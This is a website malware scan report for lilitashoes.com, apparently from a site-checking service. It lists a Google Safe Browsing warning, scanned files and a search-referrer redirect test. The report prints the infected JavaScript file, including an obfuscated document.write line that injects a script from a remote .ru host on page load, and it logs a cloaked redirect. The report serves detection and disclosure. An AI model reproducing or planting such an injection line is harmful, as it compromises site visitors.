Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lilitashoes.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://lilitashoes.com/ | 200 OK Content-Length: 1761 Content-Type: text/html | clean |
http://lilitashoes.com/AC_RunActiveContent.js | 200 OK Content-Length: 3349 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, embedAttrs) { var str = '<object '; for (var i in objAttrs) str += i + '="' + objAttrs[i] + '" '; str += '>'; for (var i in params) str += '<param name="' + i + '" value="' + params[i] + '" /> '; str += '<embed '; for (
ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; }
document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/IMAP.js"></scri'+'pt>');
Antivirus reports:
http://addonrock.ru/IMAP.js | 500 Can't connect to addonrock.ru:80 (Bad hostname) Content-Length: 156 Content-Type: text/plain | clean |
http://addonrock.ru/test404page.js | 500 Can't connect to addonrock.ru:80 (Bad hostname) Content-Length: 156 Content-Type: text/plain | clean |
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://lilitashoes.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: lilitashoes.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 14 Sep 2014 07:34:27 GMT Location: http://lupypciw.burriedtreas.com/b?c1=8&c2=6135404&c3=28&c4=13310&c10=3197034&ns__t=1340611159998&ns_c=UTF-8&c8=&c7=http%3A%2F%2Flilitashoes.com%2F&c9=http%3A%2F%2Flilitashoes.com%2F Server: Apache Content-Length: 467 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: UCU=27; path=/; domain=lilitashoes.com; expires=Mon, 22-Sep-2014 08:14:27 GMT | suspicious |